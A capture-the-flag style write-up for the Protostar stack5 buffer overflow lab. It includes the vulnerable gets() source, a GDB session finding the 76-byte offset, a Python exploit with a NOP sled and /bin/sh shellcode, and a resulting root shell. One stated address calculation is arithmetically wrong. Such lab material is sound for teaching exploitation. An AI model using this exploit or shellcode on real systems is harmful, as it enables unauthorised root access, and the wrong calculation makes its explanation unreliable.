stack5

Stack5

URL: https://exploit.education/protostar/stack-five/ Stack5 is a standard buffer overflow, this time introducing shellcode.

This level is at /opt/protostar/bin/stack5

Hints

At this point in time, it might be easier to use someone elses shellcode
If debugging the shellcode, use \xcc (int3) to stop the program executing and return to the debugger remove the int3s once your shellcode is done.
Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

Writeup

Here we have to use the shell code Steps to follow:

check for the padding using random string and you will get the padding from the $eip and $ebp pointer
we have to get the address from where we can enter our shell
thirdly, we will get error in our method and after debugging I found out that, the address is different, so we have to use NOP for that.

So let us start from GDB.

(gdb) disassemble main
Dump of assembler code for function main:
0x080483c4 <main+0>:    push   %ebp
0x080483c5 <main+1>:    mov    %esp,%ebp
0x080483c7 <main+3>:    and    $0xfffffff0,%esp
0x080483ca <main+6>:    sub    $0x50,%esp
0x080483cd <main+9>:    lea    0x10(%esp),%eax
0x080483d1 <main+13>:   mov    %eax,(%esp)
0x080483d4 <main+16>:   call   0x80482e8 <gets@plt>
0x080483d9 <main+21>:   leave
0x080483da <main+22>:   ret
End of assembler dump.
(gdb) break *0x080483d9
Breakpoint 1 at 0x80483d9: file stack5/stack5.c, line 11.
(gdb) r
Starting program: /opt/protostar/bin/stack5
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT

Breakpoint 1, main (argc=0, argv=0xbffff864) at stack5/stack5.c:11
11      stack5/stack5.c: No such file or directory.
        in stack5/stack5.c
(gdb) x/24x $esp
0xbffff760:     0xbffff770      0xb7ec6165      0xbffff778      0xb7eada75
0xbffff770:     0x41414141      0x42424242      0x43434343      0x44444444
0xbffff780:     0x45454545      0x46464646      0x47474747      0x48484848
0xbffff790:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0x4c4c4c4c
0xbffff7a0:     0x4d4d4d4d      0x4e4e4e4e      0x4f4f4f4f      0x50505050
0xbffff7b0:     0x51515151      0x52525252      0x53535353      0x54545454
(gdb) info frames
Undefined info command: "frames".  Try "help info".
(gdb) info frame
Stack level 0, frame at 0xbffff7c0:
 eip = 0x80483d9 in main (stack5/stack5.c:11); saved eip 0x54545454
 source language c.
 Arglist at 0xbffff7b8, args: argc=0, argv=0xbffff864
 Locals at 0xbffff7b8, Previous frame's sp is 0xbffff7c0
 Saved registers:
  ebp at 0xbffff7b8, eip at 0xbffff7bc
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x54545454 in ?? ()
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
(gdb)
(gdb)
(gdb)
(gdb) r
Starting program: /opt/protostar/bin/stack5
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS

Breakpoint 1, main (argc=1, argv=0xbffff864) at stack5/stack5.c:11
11      in stack5/stack5.c
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x5353535b
) at libc-start.c:187
187     libc-start.c: No such file or directory.
        in libc-start.c
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb) c
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb) r
Starting program: /opt/protostar/bin/stack5
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS

Breakpoint 1, main (argc=1, argv=0xbffff864) at stack5/stack5.c:11
11      stack5/stack5.c: No such file or directory.
        in stack5/stack5.c
(gdb) info frame
Stack level 0, frame at 0xbffff7c0:
 eip = 0x80483d9 in main (stack5/stack5.c:11); saved eip 0xb7eadc00
 source language c.
 Arglist at 0xbffff7b8, args: argc=1, argv=0xbffff864
 Locals at 0xbffff7b8, Previous frame's sp is 0xbffff7c0
 Saved registers:
  ebp at 0xbffff7b8, eip at 0xbffff7bc

From this, we can say that the offset is 76 and the $eip pointer will be 4 bytes after the current $eip, so 0xbffff7bc + 4 = 0xbffff780.

Then as per the discussion, we will append NOP the the hex value of NOP is \x90 and will add 100 times (it doesn't matter how many time we add NOP)

Then adding shellcode from the shell storm website.

Therefore, the exploit will be

user@protostar:/tmp$ cat exploit.py
import struct
padding = '\x41'*76
eip = struct.pack("I", 0xbffff780)
nop = "\x90" * 100
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

print padding + eip + nop + shellcode

Solution:

user@protostar:/tmp$ (python exploit.py && cat) | /opt/protostar/bin/stack5
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)

Previousstack4 Nextstack6

Last updated 2 years ago